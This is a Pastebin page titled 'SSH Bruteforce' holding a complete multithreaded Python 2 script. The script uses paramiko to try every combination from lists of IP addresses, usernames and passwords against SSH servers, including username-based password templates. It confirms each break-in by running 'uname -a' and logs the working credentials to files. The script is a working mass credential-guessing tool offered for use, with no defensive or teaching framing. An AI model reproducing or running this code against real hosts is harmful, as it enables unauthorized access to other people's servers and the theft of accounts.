daily pastebin goal
55%
SHARE
TWEET

SSH Bruteforce

ExanityMods Oct 17th, 2017 237 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import paramiko, sys, Queue, threading
  2.  
  3. class SSHBrute(threading.Thread):
  4.     def __init__(self, queue):
  5.         threading.Thread.__init__(self)
  6.         self.queue = queue    
  7.     def run(self):
  8.         while True:
  9.             ip,user,passwd = self.queue.get()
  10.             self.kraken(ip,user,passwd)
  11.             self.queue.task_done()
  12.            
  13.     def kraken(self,ip,user,passwd):
  14.         try:
  15.             if ip in cracked: return False
  16.            
  17.             if '%user%' in str(passwd):
  18.                 passwd = passwd.split("%")[0] + user + passwd.split("%")[2]
  19.             if '%User%' in str(passwd):
  20.                 pwd = user + passwd.split("%")[2]
  21.                 passwd = passwd.split("%")[0]+pwd.title()
  22.             if str(passwd) == '%null%':
  23.                 passwd = ''
  24.            
  25.             ssh = paramiko.SSHClient()
  26.             ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  27.             ssh.connect(ip, username=user, password=passwd, timeout=35)
  28.             raw.write(ip+' '+user+' '+passwd+'\n')
  29.             raw.flush()
  30.             chan = ssh.get_transport().open_session()
  31.             chan.settimeout(35)
  32.             chan.exec_command('uname -a')
  33.             data = chan.recv(1024)
  34.            
  35.             if len(data) == 0:
  36.                 nologs.write(ip+' '+user+' '+passwd+'\n')
  37.                 nologs.flush()
  38.                 return False
  39.                
  40.             val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n')
  41.             val.flush()
  42.             cracked.append(ip)
  43.             chan.close()
  44.             ssh.close()
  45.             return True
  46.         except Exception, e:
  47.             if 'uthent' in str(e):
  48.                 if dbg == 'bad':
  49.                     bad.write(ip+'\n')
  50.                     bad.flush()
  51.                 #print '\r[+]Tried '+ip+' '+user+' '+passwd+'               '
  52.                 ssh.close()
  53.                 return False
  54.             #print ip, str(e)
  55.             ssh.close()
  56.             return False
  57.            
  58. def brutemain():
  59.     if len(sys.argv) < 2:
  60.         print """
  61. Usage:
  62.   bruter ThreadNumber IpFile UserFile PassFile FilterSwitch*  
  63.  *The filter Switch Takes Either the word "bad" or "no".
  64.   If you supply the word bad, it filters in bad.txt only the ips
  65.   which indeed support ssh AUTH and password didn't work"""
  66.         return False
  67.     ThreadNR = int(sys.argv[1])
  68.     queue = Queue.Queue(maxsize=20000)
  69.     try:
  70.         i = 0
  71.         for i in range(ThreadNR):
  72.             t = SSHBrute(queue)
  73.             t.daemon = True
  74.             t.start()
  75.             i += 1
  76.     except Exception, e:
  77.         print 'Cant start more than',i,'Threads!'
  78.        
  79.     global bad
  80.     global val
  81.     global nologs
  82.     global cracked
  83.     global raw
  84.     cracked = []
  85.     bad = open('bad.txt','w')
  86.     val = open('valid.txt','a')
  87.     nologs = open('nologins.txt','a')
  88.     raw = open('raw.txt','a')
  89.     with open(str(sys.argv[2]),'rU') as ipf: ips = ipf.read().splitlines()
  90.     with open(str(sys.argv[3]),'rU') as uf: users = uf.read().splitlines()
  91.     with open(str(sys.argv[4]),'rU') as pf: passwords = pf.read().splitlines()
  92.     global dbg
  93.     dbg = str(sys.argv[5])
  94.    
  95.     try:
  96.         for password in passwords:
  97.             for user in users:
  98.                 for ip in ips:
  99.                     queue.put((ip,user,password))
  100.     except:
  101.         pass
  102.        
  103.     queue.join()
  104.  
  105. if __name__ == "__main__":
  106.     brutemain()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top